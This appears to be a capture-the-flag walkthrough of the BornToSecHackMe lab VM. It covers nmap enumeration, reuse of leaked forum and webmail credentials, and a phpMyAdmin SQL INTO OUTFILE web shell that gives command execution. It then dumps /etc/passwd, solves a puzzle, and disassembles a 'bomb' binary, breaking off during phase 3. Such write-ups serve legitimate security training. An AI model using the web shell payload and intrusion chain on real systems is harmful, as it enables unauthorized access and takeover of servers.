> nmap 192.168.1.0/24
Nmap scan report for BornToSecHackMe.wind3.hub (192.168.1.96)
Host is up (0.011s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
143/tcp open  imap
443/tcp open  https
993/tcp open  imaps


> nmap -p- 192.168.1.96
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-23 14:30 CET
Nmap scan report for BornToSecHackMe.wind3.hub (192.168.1.96)
Host is up (0.019s latency).
Not shown: 65529 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
143/tcp open  imap
443/tcp open  https
993/tcp open  imaps


> nmap -sC 192.168.1.96
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-23 14:59 CET
Nmap scan report for BornToSecHackMe.wind3.hub (192.168.1.96)
Host is up (0.0089s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp  open  ssh
| ssh-hostkey:
|   1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA)
|   2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA)
|_  256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA)
80/tcp  open  http
|_http-title: Hack me if you can
143/tcp open  imap
|_imap-capabilities: LOGINDISABLEDA0001 ENABLE have IMAP4rev1 STARTTLS listed post-login capabilities more OK IDLE ID Pre-login SASL-IR LITERAL+ LOGIN-REFERRALS
|_ssl-date: 2023-01-23T13:59:27+00:00; +1s from scanner time.
443/tcp open  https
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=BornToSec
| Not valid before: 2015-10-08T00:19:46
|_Not valid after:  2025-10-05T00:19:46
|_ssl-date: 2023-01-23T13:59:24+00:00; 0s from scanner time.
993/tcp open  imaps
|_ssl-date: 2023-01-23T13:59:24+00:00; +1s from scanner time.


> nmap 192.168.1.96 --script=http-enum
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-23 15:03 CET
Nmap scan report for BornToSecHackMe.wind3.hub (192.168.1.96)
Host is up (0.0039s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
143/tcp open  imap
443/tcp open  https
| http-enum:
|   /forum/: Forum
|   /phpmyadmin/: phpMyAdmin
|   /webmail/src/login.php: squirrelmail version 1.4.22
|_  /webmail/images/sm_logo.png: SquirrelMail
993/tcp open  imaps


open the web browser and try to go to https://192.168.1.96/forum/

we see "Probleme login ?"

after searching we notice this line:
Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2

it seems that a password is used as a user

we search up in the rest of the page and we found that the post is posted by Imezard

we try to log in the forum with that password and Success!!

Now we can see the profile where we find a mail: laurie@borntosec.net

And at the bottom we ca read powered by "my little forum"

we can try to connect to https://192.168.1.96/webmail/ with the same password

there we find a mail named "DB Access"

we find these credentials root/Fg-'kKXBj87E:aJ$ witch we can use to log into the phpmyadmin

now we need to inject SQL, with this https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/ we have an idea where to start

modifyng the command to a linux reverse shell we arrive at:
SELECT "<? system($_GET['cmd']); ?>" into outfile "/var/www/forum/backdoor.php"
but it doesn't work cause permissions.

but if we remember about the forum, we can search about some vulnerabilities and we find at https://github.com/ilosuna/mylittleforum that: "Depending on your server configuration the write permissions of the subdirectory templates_c (CHMOD 770, 775 or 777) and the file config/db_settings.php (CHMOD 666) might need to be changed in order that they are writable by the script"

so we can use:
SELECT "<? system($_GET['cmd']); ?>" into outfile "/var/www/forum/templates_c/backdoor.php"


Now if we use "https://192.168.1.96/forum/templates_c/backdoor.php?cmd=" we have a reverse shell!!

if we type "cat /etc/passwd"

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:106::/var/run/dbus:/bin/false whoopsie:x:103:107::/nonexistent:/bin/false landscape:x:104:110::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin ft_root:x:1000:1000:ft_root,,,:/home/ft_root:/bin/bash mysql:x:106:115:MySQL Server,,,:/nonexistent:/bin/false ftp:x:107:116:ftp daemon,,,:/srv/ftp:/bin/false lmezard:x:1001:1001:laurie,,,:/home/lmezard:/bin/bash laurie@borntosec.net:x:1002:1002:Laurie,,,:/home/laurie@borntosec.net:/bin/bash laurie:x:1003:1003:,,,:/home/laurie:/bin/bash thor:x:1004:1004:,,,:/home/thor:/bin/bash zaz:x:1005:1005:,,,:/home/zaz:/bin/bash dovecot:x:108:117:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:109:65534:Dovecot login user,,,:/nonexistent:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false


if we translate the spaces with newlines:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
whoopsie:x:103:107::/nonexistent:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
ft_root:x:1000:1000:ft_root,,,:/home/ft_root:/bin/bash
mysql:x:106:115:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:107:116:ftp daemon,,,:/srv/ftp:/bin/false
lmezard:x:1001:1001:laurie,,,:/home/lmezard:/bin/bash
laurie@borntosec.net:x:1002:1002:Laurie,,,:/home/laurie@borntosec.net:/bin/bash
laurie:x:1003:1003:,,,:/home/laurie:/bin/bash
thor:x:1004:1004:,,,:/home/thor:/bin/bash
zaz:x:1005:1005:,,,:/home/zaz:/bin/bash
dovecot:x:108:117:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:109:65534:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:110:118::/var/spool/postfix:/bin/false

but no password is shown

so we search in the file system until we founf a dir named LOOKATME in the home directory

there it is a file named password that contains lmezard:G!@M6f4Eatau{sF"

we can now connect via ftp!

we find a README and a "fun" file that we download

in README we have:
Complete this little challenge and use the result as password for user 'laurie' to login in ssh

then we use "file fun": POSIX tar archive (GNU)
so "mv fun fun.tar" and "tar -xf fun.tar"

we obtain a directory filled with a lot of files, but if we "ls -la" we notice that "BJPCP.pcap" is really heavy so we open it with vim to see and we find out that there are some functions named "getmeX" where X is a number that compose the password

so we can use "cat * | grep -R getme" to get the other getme

0T16C.pcap:char getme4() {
32O0M.pcap:char getme7() {
331ZU.pcap:char getme1() {
4KAOH.pcap:char getme5() {
91CD0.pcap:char getme6() {
B62N4.pcap:char getme3() {
BJPCP.pcap:char getme8() {
BJPCP.pcap:char getme9() {
BJPCP.pcap:char getme10() {
BJPCP.pcap:char getme11() {
BJPCP.pcap:char getme12()
BJPCP.pcap:     printf("%c",getme1());
BJPCP.pcap:     printf("%c",getme2());
BJPCP.pcap:     printf("%c",getme3());
BJPCP.pcap:     printf("%c",getme4());
BJPCP.pcap:     printf("%c",getme5());
BJPCP.pcap:     printf("%c",getme6());
BJPCP.pcap:     printf("%c",getme7());
BJPCP.pcap:     printf("%c",getme8());
BJPCP.pcap:     printf("%c",getme9());
BJPCP.pcap:     printf("%c",getme10());
BJPCP.pcap:     printf("%c",getme11());
BJPCP.pcap:     printf("%c",getme12());
G7Y8I.pcap:char getme2() {


Now we search:
cat * | grep ".*ret.*"

//file483       return 'a';
//file697       return 'I';
        return 'w';
        return 'n';
        return 'a';
        return 'g';
        return 'e';
//file161       return 'e';
//file252       return 't';
//file163       return 'p';
//file640       return 'r';
//file3 return 'h';


With a simple anagram we have:
Iheartpwnage

so in sha256:
> echo -n "Iheartpwnage" | openssl dgst -sha256
SHA2-256(stdin)= 330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4


> ls
bomb  README

> cat README
Diffuse this bomb!
When you have all the password use it as "thor" user with ssh.

HINT:
P
 2
 b

o
4

NO SPACE IN THE PASSWORD (password is case sensitive).


> gdb bomb
(gdb) disass main
...
(gdb) disass phase_1
...

we can see that is a simple string compare

(gdb) x /s 0x80497c0
0x80497c0:      "Public speaking is very easy."

(gdb) disass phase_2
...
(gdb) disass read_six_numbers
...
we can see that this funxtions compares the current number with the previous multiplied by his index incremented so if we can try;
1 2 6 24 120 720

(gdb) disass phase_3
...
we can see that comares the input values like a switch case, where the value of the second is used to compare the third, with the hints we know that the second value is 'b' so the third will be 0xD6 so we can try:
1 b 214